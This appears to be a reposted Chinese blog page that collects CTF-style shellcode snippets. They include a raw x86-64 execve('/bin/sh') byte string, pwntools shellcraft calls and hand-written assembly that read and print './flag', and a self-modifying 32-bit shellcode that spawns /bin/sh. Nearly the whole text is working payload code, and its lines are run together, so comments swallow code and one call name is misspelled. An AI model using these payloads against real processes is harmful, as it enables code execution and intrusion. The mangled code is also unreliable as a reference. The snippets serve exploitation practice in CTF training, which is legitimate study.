本文共 2190 字,大约阅读时间需要 7 分钟。
shellcode = "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05"
#pwntoolscontext.arch = elf.archshellcode = asm(shellcreaft.sh())
#pwntoolsshellcode = ''shellcode += shellcraft.open('./flag')shellcode += shellcraft.read('eax','esp',0x100)shellcode += shellcraft.write(1,'esp',0x100)payload1 = asm(shellcode) shellcode = asm(''' push 0x67616c66 mov rdi,rsp xor esi,esi push 2 pop rax syscall mov rdi,rax mov rsi,rsp mov edx,0x100 xor eax,eax syscall mov edi,1 mov rsi,rsp push 1 pop rax syscall ''') context.arch = elf.archshellcode = asm(shellcreaft.sh())
shellcode = asm(''' push eax pop ebx push edx pop eax dec eax xor al,0x46 xor byte ptr[ebx+0x35],al #set int 0x80 xor byte ptr[ebx+0x36],al push ecx pop eax xor al, 0x41 xor al, 0x40 push ecx pop eax xor al, 0x41 xor al, 0x40 push ecx pop eax xor al, 0x41 xor al, 0x40 push ecx # set al=0xb pop eax xor al, 0x41 xor al, 0x40 push edx # set ecx=0 pop ecx push 0x68 # push /bin/sh push 0x732f2f2f push 0x6e69622f push esp pop ebx ''') #write by asmshellcode = """/*open(./flag)*/push 0x1010101xor dword ptr [esp], 0x1016660push 0x6c662f2emov eax,0x5mov ebx,espxor ecx,ecxint 0x80/*read(fd,buf,0x100)*/mov ebx,eaxmov ecx,espmov edx,0x30mov eax,0x3int 0x80/*write(1,buf,0x100)*/mov ebx,0x1mov eax,0x4int 0x80"""
#pwntoolsshellcode = ''shellcode += shellcraft.open('./flag')shellcode += shellcraft.read('eax','esp',0x100)shellcode += shellcraft.write(1,'esp',0x100)payload1 = asm(shellcode) 转载地址:http://mtugf.baihongyu.com/